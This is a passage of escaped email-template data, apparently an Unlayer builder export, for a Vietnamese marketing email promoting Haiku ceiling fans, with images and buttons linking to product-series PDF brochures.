0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#363675\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":16}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-25 {\\r\\n    width: 150px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-33p33 {\\r\\n    width: 199.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #363675; text-decoration: none; }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ffffff;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ffffff;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n    \\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #017ed0;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #017ed0;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 19px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502368565-logo_baf.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 26%;max-width: 150.8px;\\\" width=\\\"150.8\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 16px; line-height: 22.4px;\\\"><strong><span style=\\\"font-family: Montserrat, sans-serif; line-height: 22.4px;\\\">HAIKU - Qu\\u1ea1t tr\\u1ea7n cao c\\u1ea5p \\u0111\\u01b0\\u1ee3c thi\\u1ebft k\\u1ebf v\\u00e0 s\\u1ea3n xu\\u1ea5t t\\u1eeb Hoa K\\u1ef3.<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 26px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503530290-haiku-fans-residential-0.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 20px; font-weight: 400;\\\">Ki\\u1ec3u D\\u00e1ng Thi\\u1ebft K\\u1ebf Th\\u1ee7 C\\u00f4ng<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 35px; font-weight: 400;\\\">Tho\\u1ea3i M\\u00e1i S\\u00e1ng T\\u1ea1o<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503040555-stock-templates1677136007974-haiku-finishes.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h4 style=\\\"margin: 0px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 16px; font-weight: 400;\\\">MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe PHONG C\\u00c1CH CHO T\\u1eeaNG KH\\u00d4NG GIAN S\\u1ed0NG<\\/h4>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\" style=\\\"height:37px; v-text-anchor:middle; width:143px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">HAIKU H SERIES<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/I-series.pdf\\\" style=\\\"height:37px; v-text-anchor:middle; width:137px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e67e23\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/I-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e67e23; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">HAIKU I SERIES<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\" style=\\\"height:54px; v-text-anchor:middle; width:130px;\\\" arcsize=\\\"7.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#2dc26b\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #2dc26b; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">HAIKU L SERIES<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/cutsheet-haiku-en.pdf\\\" style=\\\"height:54px; v-text-anchor:middle; width:130px;\\\" arcsize=\\\"7.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#843fa1\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/cutsheet-haiku-en.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #843fa1; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">HAIKU OUTDOOR<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 